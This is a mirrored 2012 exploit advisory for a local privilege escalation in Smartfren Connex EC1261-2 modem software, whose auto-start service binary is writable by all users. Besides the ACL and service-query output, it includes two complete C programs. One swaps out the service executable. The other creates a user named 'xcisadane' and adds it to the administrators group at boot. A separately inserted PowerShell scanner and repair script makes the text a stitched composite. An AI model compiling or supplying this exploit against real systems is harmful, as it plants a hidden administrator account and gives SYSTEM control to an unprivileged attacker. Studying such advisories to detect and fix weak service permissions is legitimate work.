securityvulns SECURITYVULNS:DOC:28585, Oct 01, 2012 (mirrored on vulners.com)
==========================================================================
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability

:-------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
: # Date : 26 September 2012
: # Author : X-Cisadane
: # Software Link : http://www.smartfren.com/data/ec1261.html
: # File Version : 21.005.15.03.836
: # Category : Desktop (Windows) Applications
: # Platform : Win32 & Win64
: # Vulnerability : Local Privilege Escalation Vulnerability
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------------------------------------------------------------------------------------------------------------------------------:
Summary

Smartfren Connex EC 1261-2 UI OUC (ouc.exe, installed in the UpdateDog directory) ships with the Smartfren Connex EC USB EVDO modem software.
It is a daemon that updates the modem files of Smartfren Connex and is registered as a Windows service.

Description

Improper file permissions on the application's executable allow local privilege escalation.
Any unprivileged local user can replace the executable with a binary of their choice.
The binary (ouc.exe) is registered as an auto-start service running as LocalSystem, so the replacement is executed with SYSTEM privileges at the next boot.
Tested on: Microsoft Windows 7 Ultimate 64 Bit (EN).

Proof of Concept

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Smartfren Connex EC1261-2 UI. OUC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
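The two queries above (cacls on the binary, sc qc on the service) are the manual form of a general check: which auto-start services run as LocalSystem from a binary that a low-privilege principal can overwrite or replace? The PowerShell below is an added example, not part of the original advisory or of the Smartfren software; it reads service definitions live from the host, so it is not limited to ouc.exe, and includes an icacls-based repair for any finding. The function names and the list of low-privilege principals are this example's own choices.

```powershell
# Principals every unprivileged local user belongs to; a write grant to any of them is a finding.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Specific rights that let a user rewrite, replace, re-ACL or take over the file.
$WriteRights = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                     [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                     [System.Security.AccessControl.FileSystemRights]::Delete -bor
                     [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                     [System.Security.AccessControl.FileSystemRights]::TakeOwnership)
# Inherited ACEs are often stored as generic rights; GENERIC_WRITE / GENERIC_ALL also count.
$GenericWriteBits = 0x40000000 -bor 0x10000000

function Get-ServiceBinaryPath {
    # Extract the executable from a Win32_Service.PathName, which may be quoted with
    # arguments ("C:\x\svc.exe" -arg) or unquoted with spaces, as in the advisory's
    # C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
    param([string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.*?\.exe)')   { return $Matches[1] }   # -match is case-insensitive
    return ($PathName -split '\s+')[0]
}

function Test-WeakServiceBinary {
    # Return the Allow ACEs on $Path that give a low-privilege principal write-class rights.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($LowPrivPrincipals -contains $_.IdentityReference.Value) -and
        (([int]$_.FileSystemRights -band ($WriteRights -bor $GenericWriteBits)) -ne 0)
    }
}

function Find-WeakLocalSystemServices {
    # Same filter the advisory applied by hand: AUTO_START + LocalSystem, then the binary's ACL.
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' } |
        ForEach-Object {
            $bin  = Get-ServiceBinaryPath $_.PathName
            $weak = @(Test-WeakServiceBinary $bin)
            if ($weak.Count -gt 0) {
                [pscustomobject]@{
                    Service = $_.Name
                    Binary  = $bin
                    WeakAce = ($weak | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
                }
            }
        }
}

function Repair-ServiceBinaryAcl {
    # Remediation for a finding (run elevated): drop inheritance, keep SYSTEM and
    # Administrators at full control, give Users read+execute only, then re-check.
    param([Parameter(Mandatory)][string]$Path)
    & icacls.exe $Path /inheritance:r /grant:r 'SYSTEM:(F)' 'Administrators:(F)' 'Users:(RX)' | Out-Null
    @(Test-WeakServiceBinary $Path).Count -eq 0
}

Find-WeakLocalSystemServices | Format-Table -AutoSize
```

On the advisory's host this would list the "Smartfren Connex EC1261-2 UI. RunOuc" service with ouc.exe and the Everyone / BUILTIN\Users FullControl entries; Repair-ServiceBinaryAcl returns $true once those grants are gone. Note the check only looks at the binary itself: a directory that lets Users add files, or an unquoted path with spaces, are separate weaknesses this script does not evaluate.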


The following attack scenario could be used:

  1. An attacker (unprivileged user) renames the Smartfren Connex EC1261-2 UI. OUC program file.
    For example, the Smartfren Connex EC1261-2 UI. OUC program file could be:
    For Win32 -> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
    For Win64 -> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
    Rename the file to ouc.exe.old.
  2. The attacker copies a malicious executable with the original file name (ouc.exe) into the same location.
  3. Restart the system.
    After the restart the service starts the attacker's file with SYSTEM privileges.

The same can be done with the following two small programs:
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile the source below with Dev-C++.
Save it as C:\sploit.cpp (the resulting sploit.exe swaps the service binary and needs no special privileges).

#include <stdio.h>
#include <windows.h>

/* Service binary that the auto-start service runs as LocalSystem (see the sc qc output above) */
#define DEFAULT_TARGET  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
/* Where the original ouc.exe is parked so it can be restored afterwards */
#define DEFAULT_BACKUP  "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
/* Attacker-supplied replacement, built from bin.cpp below */
#define DEFAULT_EXECUTE "C:\\bin.exe"

int main(int argc, char *argv[])
{
    /* Both operations succeed from an unprivileged account because of the Everyone:F ACE on ouc.exe */
    if (!MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP)) {
        printf("MoveFile failed, error %lu\n", GetLastError());
        return 1;
    }
    if (!CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE)) {
        printf("CopyFile failed, error %lu\n", GetLastError());
        return 1;
    }
    return 0;
}

Compile the source below with Dev-C++.
Save it as C:\bin.cpp and the compiled binary as C:\bin.exe, the path sploit.exe copies from.

#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
/* First token is argv[0] for cmd.exe; the commands run as LocalSystem once the service starts this binary */
#define ONE "cmd.exe /C net user xcisadane xcisadane /add"
#define TWO "cmd.exe /C net localgroup administrators xcisadane /add"

/* Run one command and wait for it, so the account exists before it is added to the group */
static void run(const char *cmdline)
{
    STARTUPINFO si = {sizeof(STARTUPINFO)};
    PROCESS_INFORMATION pi;
    char buf[256];
    lstrcpyn(buf, cmdline, sizeof(buf));   /* CreateProcess may modify lpCommandLine */
    if (CreateProcess(CMD, buf, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}

int main(int argc, char *argv[])
{
    run(ONE);
    run(TWO);
    return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Run sploit.exe from C:\.
Reboot Windows. After the reboot, run "net user" from a command prompt; if a user named xcisadane exists, the exploit succeeded.
P.S.: For Win32 change "Program Files (x86)" to "Program Files" in both paths.
